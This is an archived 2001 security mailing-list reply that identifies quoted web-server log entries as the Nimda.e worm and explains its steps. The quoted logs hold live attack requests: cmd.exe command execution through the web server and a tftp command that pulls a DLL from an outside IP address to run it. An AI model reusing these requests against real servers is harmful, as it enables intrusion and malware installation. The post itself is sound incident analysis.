Re: New Worm Variant?

From: Ryan Russell (ryanat_private)
Date: Tue Oct 30 2001 - 09:08:42 PST

  • Next message: Bradley Filmer: "33270:trinity connection form port 80 to local machine on port"

    On Mon, 29 Oct 2001, Aj Effin Reznor wrote:
    
    > [29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir
    > HTTP/1.0" 200 394 "-" "-"
    > [29/Oct/2001:17:09:11 -0800] "GET
    /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll
    > HTTP/1.0" 200 449 "-" "-"
    >[29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330
    >"-" "-"
    
    As someone pointed out, this is Nimda.e .  What's going on here is that
    since your web server is responding with a 200 to the exploit attempt, it
    thinks it has found a vulnerable victim.  So it issues the tftp command to
    try and make your web server download a copy.  Then it sends a command to
    try to execute the file it thinks it has caused you to download.
    
    					Ryan
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 09:41:08 PST